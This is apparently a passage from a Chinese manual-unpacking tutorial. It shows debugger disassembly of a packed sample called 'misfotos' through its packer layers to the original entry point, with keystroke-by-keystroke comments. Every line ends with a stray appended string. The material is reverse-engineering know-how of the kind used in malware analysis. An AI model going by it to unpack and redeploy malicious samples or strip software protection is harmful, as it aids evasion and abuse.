00401DF0 81FA CA307D84 CMP EDX,847D30CAmvgtst
00401DF6 7A 08 JPE SHORT misfotos.00401E00mvgtst
00401DF8 1105 00FC4000 ADC DWORD PTR DS:[40FC00],EAXmvgtst
00401DFE 1BC2 SBB EAX,EDXmvgtst
00401E00 1BD1 SBB EDX,ECXmvgtst
00401E02 C1F9 18 SAR ECX,18mvgtst
00401E05 68 3C000000 PUSH 3Cmvgtst
00401E0A FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
00401E10 0BC8 OR ECX,EAXmvgtst
00401E12 1BD0 SBB EDX,EAXmvgtst
00401E14 0305 80FA4000 ADD EAX,DWORD PTR DS:[40FA80]mvgtst
00401E1A 81C6 9A12D1D0 ADD ESI,D0D1129Amvgtst
00401E20 81FB 48174000 CMP EBX,misfotos.00401748mvgtst
00401E26 ^ 0F85 A6FCFFFF JNZ misfotos.00401AD2 ; 这里的向上回跳不要跳,我们直接执行到下一行的代码处,因为这里是循环.mvgtst
00401E2C 68 50000000 PUSH 50 ; [F4]运行到这里,继续[F8]向下一直走.mvgtst
00401E31 68 8C000000 PUSH 8Cmvgtst
00401E36 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgnmvgtst
00401E3C 13D1 ADC EDX,ECXmvgtst
00401E3E C1C8 1B ROR EAX,1Bmvgtst
00401E41 BA B13EEE10 MOV EDX,10EE3EB1mvgtst
00401E46 81F9 9E40C622 CMP ECX,22C6409Emvgtst
00401E4C 7E 0B JLE SHORT misfotos.00401E59mvgtst
00401E4E 3305 50FB4000 XOR EAX,DWORD PTR DS:[40FB50]mvgtst
00401E54 B9 79450E10 MOV ECX,100E4579mvgtst
00401E59 3305 50FB4000 XOR EAX,DWORD PTR DS:[40FB50]mvgtst
00401E5F B9 C18E4B4F MOV ECX,4F4B8EC1mvgtst
00401E64 23D0 AND EDX,EAXmvgtst
00401E66 68 14000000 PUSH 14mvgtst
00401E6B FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObjectmvgtst
00401E71 0905 60FF4000 OR DWORD PTR DS:[40FF60],EAXmvgtst
00401E77 03C1 ADD EAX,ECXmvgtst
00401E79 E9 0C000000 JMP misfotos.00401E8Amvgtst
00401E7E C1E1 08 SHL ECX,8mvgtst
00401E81 0B05 90FB4000 OR EAX,DWORD PTR DS:[40FB90]mvgtst
00401E87 C1CA 0C ROR EDX,0Cmvgtst
00401E8A 68 BE000000 PUSH 0BEmvgtst
00401E8F FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401E95 C1E1 1A SHL ECX,1Amvgtst
00401E98 BA 66CD8033 MOV EDX,3380CD66mvgtst
00401E9D 5B POP EBXmvgtst
00401E9E 68 F0000000 PUSH 0F0mvgtst
00401EA3 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColormvgtst
00401EA9 48 DEC EAXmvgtst
00401EAA BA A97A171B MOV EDX,1B177AA9mvgtst
00401EAF 81EA FD9A1BC0 SUB EDX,C01B9AFDmvgtst
00401EB5 81F9 02AAC65E CMP ECX,5EC6AA02mvgtst
00401EBB 72 08 JB SHORT misfotos.00401EC5mvgtst
00401EBD C1F0 11 SAL EAX,11mvgtst
00401EC0 B9 853F21A6 MOV ECX,A6213F85mvgtst
00401EC5 C1F0 02 SAL EAX,2mvgtst
00401EC8 BA B5C941E2 MOV EDX,E241C9B5mvgtst
00401ECD 03D1 ADD EDX,ECXmvgtst
00401ECF 68 AA000000 PUSH 0AAmvgtst
00401ED4 68 BE000000 PUSH 0BEmvgtst
00401ED9 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgnmvgtst
00401EDF 81C1 428C77DA ADD ECX,DA778C42mvgtst
00401EE5 2915 20FD4000 SUB DWORD PTR DS:[40FD20],EDXmvgtst
00401EEB FFD3 CALL EBX ; 到这里后千万不要按[F8]去步过执行,那么会跑飞的.应该按[F7]进去,里边是下一个壳的OEP入口.mvgtst
00401EED 68 3C000000 PUSH 3Cmvgtst
00401EF2 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401EF8 03C1 ADD EAX,ECXmvgtst
00401EFA C1C2 13 ROL EDX,13mvgtst
00401EFD C1E8 18 SHR EAX,18mvgtst
00401F00 E9 10000000 JMP misfotos.00401F15mvgtst
00401F05 1315 A0FB4000 ADC EDX,DWORD PTR DS:[40FBA0]mvgtst
00401F0B B9 824E7AB1 MOV ECX,B17A4E82mvgtst
00401F10 B8 8AA4C975 MOV EAX,75C9A48Amvgtst
00401F15 68 82000000 PUSH 82mvgtst
00401F1A FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColormvgtst
00401F20 190D 20FC4000 SBB DWORD PTR DS:[40FC20],ECXmvgtst
00401F26 C1EA 0B SHR EDX,0Bmvgtst
00401F29 130D C0FD4000 ADC ECX,DWORD PTR DS:[40FDC0]mvgtst
00401F2F E9 10000000 JMP misfotos.00401F44mvgtst
00401F34 B8 6587CF97 MOV EAX,97CF8765mvgtst
00401F39 81C1 0E541C99 ADD ECX,991C540Emvgtst
00401F3F B8 957536C9 MOV EAX,C9367595mvgtst
00401F44 61 POPADmvgtst
00401F45 68 64000000 PUSH 64mvgtst
00401F4A FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectTypemvgtst
00401F50 81D2 E1473A10 ADC EDX,103A47E1mvgtst
00401F56 C1C1 02 ROL ECX,2mvgtst
00401F59 C1D2 01 RCL EDX,1mvgtst
00401F5C 3BC8 CMP ECX,EAXmvgtst
00401F5E 76 07 JBE SHORT misfotos.00401F67mvgtst
00401F60 BA 4E40CC04 MOV EDX,4CC404Emvgtst
00401F65 23C8 AND ECX,EAXmvgtst
00401F67 1915 40FE4000 SBB DWORD PTR DS:[40FE40],EDXmvgtst
00401F6D 81D1 B9200B37 ADC ECX,370B20B9mvgtst
00401F73 C1DA 10 RCR EDX,10mvgtst
00401F76 68 64000000 PUSH 64mvgtst
00401F7B 68 DC000000 PUSH 0DCmvgtst
00401F80 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgnmvgtst
00401F86 81C9 196ABB10 OR ECX,10BB6A19mvgtst
00401F8C 0B05 50F94000 OR EAX,DWORD PTR DS:[40F950]mvgtst
00401F92 81E2 C985C27A AND EDX,7AC285C9mvgtst
00401F98 68 5A000000 PUSH 5Amvgtst
00401F9D FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColormvgtst
00401FA3 C1F9 06 SAR ECX,6mvgtst
00401FA6 C1F0 0F SAL EAX,0Fmvgtst
00401FA9 B9 A58554AF MOV ECX,AF5485A5mvgtst
00401FAE E9 0C000000 JMP misfotos.00401FBFmvgtst
00401FB3 3305 D0FE4000 XOR EAX,DWORD PTR DS:[40FED0]mvgtst
00401FB9 2315 00FB4000 AND EDX,DWORD PTR DS:[40FB00]mvgtst
00401FBF C3 RETNmvgtst
----------------------------------------------------------------------------------------------------mvgtst
第三层：压缩壳mvgtst
mvgtst
003C0000 55 PUSH EBP ; 第三层压缩壳入口处.[F8]向下走.mvgtst
003C0001 8BEC MOV EBP,ESPmvgtst
003C0003 81EC 90000000 SUB ESP,90mvgtst
003C0009 E8 00000000 CALL 003C000E ; [F7]步入.mvgtst
003C000E 58 POP EAX ; 步入后来到这里,继续[F8]向下走.mvgtst
003C000F 8BF0 MOV ESI,EAXmvgtst
003C0011 2D 2B144000 SUB EAX,40142Bmvgtst
003C0016 8945 A0 MOV DWORD PTR SS:[EBP-60],EAXmvgtst
003C0019 81E6 00F0FFFF AND ESI,FFFFF000mvgtst
003C001F 8975 B0 MOV DWORD PTR SS:[EBP-50],ESImvgtst
003C0022 8B75 04 MOV ESI,DWORD PTR SS:[EBP+4]mvgtst
003C0025 81E6 00F0FFFF AND ESI,FFFFF000mvgtst
003C002B 66:813E 4D5A CMP WORD PTR DS:[ESI],5A4Dmvgtst
003C0030 74 08 JE SHORT 003C003Amvgtst
003C0032 81EE 00100000 SUB ESI,1000mvgtst
003C0038 ^ EB F1 JMP SHORT 003C002B ; 这里的循环回跳不要跳.mvgtst
003C003A 8B46 3C MOV EAX,DWORD PTR DS:[ESI+3C] ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst
003C003D 3D 00200000 CMP EAX,2000mvgtst
003C0042 ^ 77 EE JA SHORT 003C0032mvgtst
003C0044 03C6 ADD EAX,ESImvgtst
003C0046 8138 50450000 CMP DWORD PTR DS:[EAX],4550mvgtst
003C004C ^ 75 E4 JNZ SHORT 003C0032mvgtst
003C004E 8975 C8 MOV DWORD PTR SS:[EBP-38],ESImvgtst
003C0051 8B46 3C MOV EAX,DWORD PTR DS:[ESI+3C]mvgtst
003C0054 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]mvgtst
003C0057 8B48 28 MOV ECX,DWORD PTR DS:[EAX+28]mvgtst
003C005A 034D C8 ADD ECX,DWORD PTR SS:[EBP-38]mvgtst
003C005D 894D AC MOV DWORD PTR SS:[EBP-54],ECXmvgtst
003C0060 64:A1 30000000 MOV EAX,DWORD PTR FS:[30]mvgtst
003C0066 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]mvgtst
003C0069 8B40 1C MOV EAX,DWORD PTR DS:[EAX+1C]mvgtst
003C006C 8B00 MOV EAX,DWORD PTR DS:[EAX]mvgtst
003C006E 8B40 08 MOV EAX,DWORD PTR DS:[EAX+8]mvgtst
003C0071 8945 F8 MOV DWORD PTR SS:[EBP-8],EAXmvgtst
003C0074 B8 44332211 MOV EAX,11223344mvgtst
003C0079 B8 44332211 MOV EAX,11223344mvgtst
003C007E 68 00700000 PUSH 7000mvgtst
003C0083 68 7BD1486C PUSH 6C48D17Bmvgtst
003C0088 68 691EAD0F PUSH 0FAD1E69mvgtst
003C008D 68 00880000 PUSH 8800mvgtst
003C0092 8F45 80 POP DWORD PTR SS:[EBP-80]mvgtst
003C0095 8F85 70FFFFFF POP DWORD PTR SS:[EBP-90]mvgtst
003C009B 8F45 94 POP DWORD PTR SS:[EBP-6C]mvgtst
003C009E 8F45 9C POP DWORD PTR SS:[EBP-64]mvgtst
003C00A1 8D35 8D184000 LEA ESI,DWORD PTR DS:[40188D]mvgtst
003C00A7 0375 A0 ADD ESI,DWORD PTR SS:[EBP-60]mvgtst
003C00AA 8D7D D8 LEA EDI,DWORD PTR SS:[EBP-28]mvgtst
003C00AD 56 PUSH ESImvgtst
003C00AE 56 PUSH ESImvgtst
003C00AF FF75 F8 PUSH DWORD PTR SS:[EBP-8]mvgtst
003C00B2 E8 22030000 CALL 003C03D9 ; 这个CALL可以直接[F8]步过.mvgtst
003C00B7 AB STOS DWORD PTR ES:[EDI]mvgtst
mvgtst
003C00B8 5E POP ESImvgtst
003C00B9 46 INC ESImvgtst
003C00BA 807E FF 00 CMP BYTE PTR DS:[ESI-1],0mvgtst
003C00BE ^ 75 F9 JNZ SHORT 003C00B9 ; 这里的循环回跳不要跳.mvgtst
003C00C0 803E AB CMP BYTE PTR DS:[ESI],0AB ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst
003C00C3 ^ 75 E8 JNZ SHORT 003C00AD ; 这里的循环回跳不要跳.mvgtst
003C00C5 8B5D 94 MOV EBX,DWORD PTR SS:[EBP-6C] ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst
003C00C8 8B95 70FFFFFF MOV EDX,DWORD PTR SS:[EBP-90]mvgtst
003C00CE 8B4D 80 MOV ECX,DWORD PTR SS:[EBP-80]mvgtst
003C00D1 60 PUSHADmvgtst
003C00D2 6A 40 PUSH 40mvgtst
003C00D4 68 00100000 PUSH 1000mvgtst
003C00D9 51 PUSH ECXmvgtst
003C00DA 6A 00 PUSH 0mvgtst
003C00DC FF55 E8 CALL DWORD PTR SS:[EBP-18]mvgtst
003C00DF 8945 90 MOV DWORD PTR SS:[EBP-70],EAXmvgtst
003C00E2 0BC0 OR EAX,EAXmvgtst
003C00E4 61 POPADmvgtst
003C00E5 0F84 D8020000 JE 003C03C3mvgtst
003C00EB C1E9 02 SHR ECX,2mvgtst
003C00EE 8B75 9C MOV ESI,DWORD PTR SS:[EBP-64]mvgtst
003C00F1 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]mvgtst
003C00F4 8B7D 90 MOV EDI,DWORD PTR SS:[EBP-70]mvgtst
003C00F7 AD LODS DWORD PTR DS:[ESI]mvgtst
003C00F8 2BC2 SUB EAX,EDXmvgtst
003C00FA 33C3 XOR EAX,EBXmvgtst
003C00FC AB STOS DWORD PTR ES:[EDI]mvgtst
003C00FD ^ E2 F8 LOOPD SHORT 003C00F7 ; 这里的循环回跳不要跳.mvgtst
003C00FF 8B45 90 MOV EAX,DWORD PTR SS:[EBP-70] ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst
003C0102 8B58 3C MOV EBX,DWORD PTR DS:[EAX+3C]mvgtst
003C0105 035D 90 ADD EBX,DWORD PTR SS:[EBP-70]mvgtst
003C0108 895D B4 MOV DWORD PTR SS:[EBP-4C],EBXmvgtst
003C010B 8D83 F8000000 LEA EAX,DWORD PTR DS:[EBX+F8]mvgtst
003C0111 8945 BC MOV DWORD PTR SS:[EBP-44],EAXmvgtst
003C0114 0FB743 06 MOVZX EAX,WORD PTR DS:[EBX+6]mvgtst
003C0118 8945 A4 MOV DWORD PTR SS:[EBP-5C],EAXmvgtst
003C011B 8B43 28 MOV EAX,DWORD PTR DS:[EBX+28]mvgtst
003C011E 8985 78FFFFFF MOV DWORD PTR SS:[EBP-88],EAXmvgtst
003C0124 8B83 80000000 MOV EAX,DWORD PTR DS:[EBX+80]mvgtst
003C012A 8945 98 MOV DWORD PTR SS:[EBP-68],EAXmvgtst
003C012D 8B43 50 MOV EAX,DWORD PTR DS:[EBX+50]mvgtst
003C0130 8985 74FFFFFF MOV DWORD PTR SS:[EBP-8C],EAXmvgtst
003C0136 8B45 90 MOV EAX,DWORD PTR SS:[EBP-70]mvgtst
003C0139 8B58 3C MOV EBX,DWORD PTR DS:[EAX+3C]mvgtst
003C013C 035D C8 ADD EBX,DWORD PTR SS:[EBP-38]mvgtst
003C013F 895D C4 MOV DWORD PTR SS:[EBP-3C],EBXmvgtst
003C0142 81C3 F8000000 ADD EBX,0F8mvgtst
003C0148 895D BC MOV DWORD PTR SS:[EBP-44],EBXmvgtst
003C014B 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]mvgtst
003C014E 50 PUSH EAXmvgtst
003C014F 6A 40 PUSH 40mvgtst
003C0151 FFB5 74FFFFFF PUSH DWORD PTR SS:[EBP-8C]mvgtst
003C0157 FF75 C8 PUSH DWORD PTR SS:[EBP-38]mvgtst
003C015A FF55 E4 CALL DWORD PTR SS:[EBP-1C]mvgtst
003C015D 0BC0 OR EAX,EAXmvgtst
003C015F 0F84 5E020000 JE 003C03C3mvgtst
003C0165 8B8D 74FFFFFF MOV ECX,DWORD PTR SS:[EBP-8C]mvgtst
003C016B C1E9 02 SHR ECX,2mvgtst
003C016E 33C0 XOR EAX,EAXmvgtst
003C0170 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]mvgtst
003C0173 F3:AB REP STOS DWORD PTR ES:[EDI]mvgtst
003C0175 B9 00100000 MOV ECX,1000mvgtst
003C017A 8B75 90 MOV ESI,DWORD PTR SS:[EBP-70]mvgtst
003C017D 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]mvgtst
003C0180 E8 23020000 CALL 003C03A8 ; 这个CALL可以直接[F8]步过.mvgtst
003C0185 8B55 A4 MOV EDX,DWORD PTR SS:[EBP-5C]mvgtst
003C0188 8B5D B4 MOV EBX,DWORD PTR SS:[EBP-4C]mvgtst
003C018B 81C3 F8000000 ADD EBX,0F8mvgtst
003C0191 8B75 90 MOV ESI,DWORD PTR SS:[EBP-70]mvgtst
003C0194 0373 14 ADD ESI,DWORD PTR DS:[EBX+14]mvgtst
003C0197 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]mvgtst
003C019A 037B 0C ADD EDI,DWORD PTR DS:[EBX+C]mvgtst
003C019D 8B4B 10 MOV ECX,DWORD PTR DS:[EBX+10]mvgtst
003C01A0 E8 03020000 CALL 003C03A8 ; 这个CALL可以直接[F8]步过.mvgtst
003C01A5 83C3 28 ADD EBX,28mvgtst
003C01A8 4A DEC EDXmvgtst
003C01A9 ^ 75 E6 JNZ SHORT 003C0191 ; 这里的循环回跳不要跳.mvgtst
003C01AB 68 00800000 PUSH 8000 ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst
003C01B0 6A 00 PUSH 0mvgtst
003C01B2 FF75 90 PUSH DWORD PTR SS:[EBP-70]mvgtst
003C01B5 FF55 EC CALL DWORD PTR SS:[EBP-14]mvgtst
003C01B8 8B5D C4 MOV EBX,DWORD PTR SS:[EBP-3C]mvgtst
003C01BB 8B83 80000000 MOV EAX,DWORD PTR DS:[EBX+80]mvgtst
003C01C1 0BC0 OR EAX,EAXmvgtst
003C01C3 0F84 9B000000 JE 003C0264mvgtst
003C01C9 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]mvgtst
003C01CC 8945 FC MOV DWORD PTR SS:[EBP-4],EAXmvgtst
003C01CF C745 B8 0000000>MOV DWORD PTR SS:[EBP-48],0mvgtst
003C01D6 8B5D FC MOV EBX,DWORD PTR SS:[EBP-4]mvgtst
003C01D9 8B43 0C MOV EAX,DWORD PTR DS:[EBX+C]mvgtst
003C01DC 0BC0 OR EAX,EAXmvgtst
003C01DE 0F84 80000000 JE 003C0264mvgtst
003C01E4 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]mvgtst
003C01E7 50 PUSH EAXmvgtst
003C01E8 50 PUSH EAXmvgtst
003C01E9 FF55 DC CALL DWORD PTR SS:[EBP-24]mvgtst
003C01EC 0BC0 OR EAX,EAXmvgtst
003C01EE 59 POP ECXmvgtst
003C01EF 75 04 JNZ SHORT 003C01F5mvgtst
003C01F1 51 PUSH ECXmvgtst
003C01F2 FF55 E0 CALL DWORD PTR SS:[EBP-20]mvgtst
003C01F5 8945 C0 MOV DWORD PTR SS:[EBP-40],EAXmvgtst
003C01F8 8B5D FC MOV EBX,DWORD PTR SS:[EBP-4]mvgtst
003C01FB 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10]mvgtst
003C01FE 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]mvgtst
003C0201 8945 A8 MOV DWORD PTR SS:[EBP-58],EAXmvgtst
003C0204 8B03 MOV EAX,DWORD PTR DS:[EBX]mvgtst
003C0206 0BC0 OR EAX,EAXmvgtst
003C0208 75 14 JNZ SHORT 003C021Emvgtst
003C020A 8B45 A8 MOV EAX,DWORD PTR SS:[EBP-58]mvgtst
003C020D 2B45 C8 SUB EAX,DWORD PTR SS:[EBP-38]mvgtst
003C0210 3D FFFFAF00 CMP EAX,0AFFFFFmvgtst
003C0215 77 44 JA SHORT 003C025Bmvgtst
003C0217 3D 00100000 CMP EAX,1000mvgtst
003C021C 72 3D JB SHORT 003C025Bmvgtst
003C021E 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]mvgtst
003C0221 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAXmvgtst
003C0224 8B75 D4 MOV ESI,DWORD PTR SS:[EBP-2C]mvgtst
003C0227 0375 B8 ADD ESI,DWORD PTR SS:[EBP-48]mvgtst
003C022A 8B36 MOV ESI,DWORD PTR DS:[ESI]mvgtst
003C022C 0BF6 OR ESI,ESImvgtst
003C022E 74 2B JE SHORT 003C025Bmvgtst
003C0230 8BC6 MOV EAX,ESImvgtst
003C0232 25 00000080 AND EAX,80000000mvgtst
003C0237 74 08 JE SHORT 003C0241mvgtst
003C0239 81E6 FFFFFF4F AND ESI,4FFFFFFFmvgtst
003C023F EB 06 JMP SHORT 003C0247mvgtst
003C0241 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]mvgtst
003C0244 83C6 02 ADD ESI,2mvgtst
003C0247 56 PUSH ESImvgtst
003C0248 FF75 C0 PUSH DWORD PTR SS:[EBP-40]mvgtst
003C024B FF55 D8 CALL DWORD PTR SS:[EBP-28]mvgtst
003C024E 8B7D B8 MOV EDI,DWORD PTR SS:[EBP-48]mvgtst
003C0251 037D A8 ADD EDI,DWORD PTR SS:[EBP-58]mvgtst
003C0254 AB STOS DWORD PTR ES:[EDI]mvgtst
003C0255 8345 B8 04 ADD DWORD PTR SS:[EBP-48],4mvgtst
003C0259 ^ EB C9 JMP SHORT 003C0224 ; 这里的循环回跳不要跳.mvgtst
003C025B 8345 FC 14 ADD DWORD PTR SS:[EBP-4],14 ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst
003C025F ^ E9 6BFFFFFF JMP 003C01CF ; 这里的循环回跳不要跳.mvgtst
003C0264 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C] ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst
003C0267 8B70 34 MOV ESI,DWORD PTR DS:[EAX+34]mvgtst
003C026A 8975 88 MOV DWORD PTR SS:[EBP-78],ESImvgtst
003C026D 8BB0 A0000000 MOV ESI,DWORD PTR DS:[EAX+A0]mvgtst
003C0273 0BF6 OR ESI,ESImvgtst
003C0275 74 47 JE SHORT 003C02BEmvgtst
003C0277 FFB0 A4000000 PUSH DWORD PTR DS:[EAX+A4]mvgtst
003C027D 8F45 CC POP DWORD PTR SS:[EBP-34]mvgtst
003C0280 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]mvgtst
003C0283 8B5D C8 MOV EBX,DWORD PTR SS:[EBP-38]mvgtst
003C0286 2B5D 88 SUB EBX,DWORD PTR SS:[EBP-78]mvgtst
003C0289 AD LODS DWORD PTR DS:[ESI]mvgtst
003C028A 8BF8 MOV EDI,EAXmvgtst
003C028C AD LODS DWORD PTR DS:[ESI]mvgtst
003C028D 8BC8 MOV ECX,EAXmvgtst
003C028F 83F8 08 CMP EAX,8mvgtst
003C0292 7E 2A JLE SHORT 003C02BEmvgtst
003C0294 294D CC SUB DWORD PTR SS:[EBP-34],ECXmvgtst
003C0297 83E9 08 SUB ECX,8mvgtst
003C029A D1E9 SHR ECX,1mvgtst
003C029C 33C0 XOR EAX,EAXmvgtst
003C029E 66:AD LODS WORD PTR DS:[ESI]mvgtst
003C02A0 8BD0 MOV EDX,EAXmvgtst
003C02A2 C1EA 0C SHR EDX,0Cmvgtst
003C02A5 83FA 03 CMP EDX,3mvgtst
003C02A8 75 0C JNZ SHORT 003C02B6mvgtst
003C02AA 25 FF0F0000 AND EAX,0FFFmvgtst
003C02AF 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]mvgtst
003C02B2 03C7 ADD EAX,EDImvgtst
003C02B4 0118 ADD DWORD PTR DS:[EAX],EBXmvgtst
003C02B6 ^ E2 E4 LOOPD SHORT 003C029Cmvgtst
003C02B8 837D CC 00 CMP DWORD PTR SS:[EBP-34],0mvgtst
003C02BC ^ 7F CB JG SHORT 003C0289mvgtst
003C02BE 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]mvgtst
003C02C1 0185 78FFFFFF ADD DWORD PTR SS:[EBP-88],EAXmvgtst
003C02C7 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]mvgtst
003C02CA 3B85 78FFFFFF CMP EAX,DWORD PTR SS:[EBP-88]mvgtst
003C02D0 75 0A JNZ SHORT 003C02DCmvgtst
003C02D2 C785 78FFFFFF 0>MOV DWORD PTR SS:[EBP-88],0mvgtst
003C02DC 8B4D C8 MOV ECX,DWORD PTR SS:[EBP-38]mvgtst
003C02DF 64:A1 18000000 MOV EAX,DWORD PTR FS:[18]mvgtst
003C02E5 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30]mvgtst
003C02E8 8B70 08 MOV ESI,DWORD PTR DS:[EAX+8]mvgtst
003C02EB 3B75 C8 CMP ESI,DWORD PTR SS:[EBP-38]mvgtst
003C02EE 74 1E JE SHORT 003C030Emvgtst
003C02F0 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]mvgtst
003C02F3 8B40 1C MOV EAX,DWORD PTR DS:[EAX+1C]mvgtst
003C02F6 BA 00100000 MOV EDX,1000mvgtst
003C02FB 4A DEC EDXmvgtst
003C02FC 74 10 JE SHORT 003C030Emvgtst
003C02FE 8B00 MOV EAX,DWORD PTR DS:[EAX]mvgtst
003C0300 3B48 08 CMP ECX,DWORD PTR DS:[EAX+8]mvgtst
003C0303 ^ 75 F6 JNZ SHORT 003C02FBmvgtst
003C0305 8BB5 78FFFFFF MOV ESI,DWORD PTR SS:[EBP-88]mvgtst
003C030B 8970 0C MOV DWORD PTR DS:[EAX+C],ESImvgtst
003C030E 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]mvgtst
003C0311 50 PUSH EAXmvgtst
003C0312 6A 20 PUSH 20mvgtst
003C0314 FFB5 74FFFFFF PUSH DWORD PTR SS:[EBP-8C]mvgtst
003C031A FF75 C8 PUSH DWORD PTR SS:[EBP-38]mvgtst
003C031D FF55 E4 CALL DWORD PTR SS:[EBP-1C]mvgtst
003C0320 8B75 C4 MOV ESI,DWORD PTR SS:[EBP-3C]mvgtst
003C0323 0FB74E 06 MOVZX ECX,WORD PTR DS:[ESI+6]mvgtst
003C0327 81C6 F8000000 ADD ESI,0F8mvgtst
003C032D 60 PUSHADmvgtst
003C032E 8B46 24 MOV EAX,DWORD PTR DS:[ESI+24]mvgtst
003C0331 25 00000080 AND EAX,80000000mvgtst
003C0336 74 13 JE SHORT 003C034Bmvgtst
003C0338 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]mvgtst
003C033B 50 PUSH EAXmvgtst
003C033C 6A 40 PUSH 40mvgtst
003C033E FF76 08 PUSH DWORD PTR DS:[ESI+8]mvgtst
003C0341 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C]mvgtst
003C0344 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]mvgtst
003C0347 50 PUSH EAXmvgtst
003C0348 FF55 E4 CALL DWORD PTR SS:[EBP-1C]mvgtst
003C034B 61 POPADmvgtst
003C034C 83C6 28 ADD ESI,28mvgtst
003C034F ^ E2 DC LOOPD SHORT 003C032D ; 这里的循环回跳不要跳.mvgtst
003C0351 83BD 78FFFFFF 0>CMP DWORD PTR SS:[EBP-88],0 ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst
003C0358 75 26 JNZ SHORT 003C0380mvgtst
003C035A 8BE5 MOV ESP,EBPmvgtst
003C035C 5D POP EBPmvgtst
003C035D 83C4 04 ADD ESP,4mvgtst
003C0360 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]mvgtst
003C0364 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]mvgtst
003C0368 8B5C24 10 MOV EBX,DWORD PTR SS:[ESP+10]mvgtst
003C036C 8B6C24 08 MOV EBP,DWORD PTR SS:[ESP+8]mvgtst
003C0370 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4]mvgtst
003C0374 8B3C24 MOV EDI,DWORD PTR SS:[ESP]mvgtst
003C0377 83C4 20 ADD ESP,20mvgtst
003C037A B8 01000000 MOV EAX,1mvgtst
003C037F C3 RETNmvgtst
003C0380 8B85 78FFFFFF MOV EAX,DWORD PTR SS:[EBP-88]mvgtst
003C0386 8BE5 MOV ESP,EBPmvgtst
003C0388 5D POP EBPmvgtst
003C0389 83C4 04 ADD ESP,4mvgtst
003C038C 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]mvgtst
003C0390 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]mvgtst
003C0394 8B5C24 10 MOV EBX,DWORD PTR SS:[ESP+10]mvgtst
003C0398 8B6C24 08 MOV EBP,DWORD PTR SS:[ESP+8]mvgtst
003C039C 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4]mvgtst
003C03A0 8B3C24 MOV EDI,DWORD PTR SS:[ESP]mvgtst
003C03A3 83C4 20 ADD ESP,20mvgtst
003C03A6 - FFE0 JMP EAX ; 这里是关键跳转,它会跳向下一个OEP入口处.mvgtst
003C03A8 52 PUSH EDXmvgtst
003C03A9 8BD1 MOV EDX,ECXmvgtst
003C03AB C1E9 02 SHR ECX,2mvgtst
003C03AE 83E2 03 AND EDX,3mvgtst
003C03B1 0BC9 OR ECX,ECXmvgtst
003C03B3 74 02 JE SHORT 003C03B7mvgtst
003C03B5 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>mvgtst
003C03B7 03CA ADD ECX,EDXmvgtst
003C03B9 0BC9 OR ECX,ECXmvgtst
003C03BB 74 04 JE SHORT 003C03C1mvgtst
003C03BD 8BCA MOV ECX,EDXmvgtst
003C03BF F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>mvgtst
003C03C1 5A POP EDXmvgtst
003C03C2 C3 RETNmvgtst
----------------------------------------------------------------------------------------------------mvgtst
----------------------------------------------------------------------------------------------------mvgtst
手脱完毕,程序的真实入口：mvgtst
mvgtst
00402B96 55 PUSH EBP ; 这里是脱壳后的真实入口,在这里就可以DUMP了(输入表没有被破坏,脱壳保存后样本可以正常运行).mvgtst
00402B97 8BEC MOV EBP,ESPmvgtst
00402B99 81EC E4070000 SUB ESP,7E4mvgtst
00402B9F 6A 01 PUSH 1mvgtst
00402BA1 FF15 A0804000 CALL DWORD PTR DS:[4080A0] ; kernel32.SetErrorModemvgtst
00402BA7 68 04010000 PUSH 104mvgtst
00402BAC 6A 00 PUSH 0mvgtst
00402BAE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]mvgtst
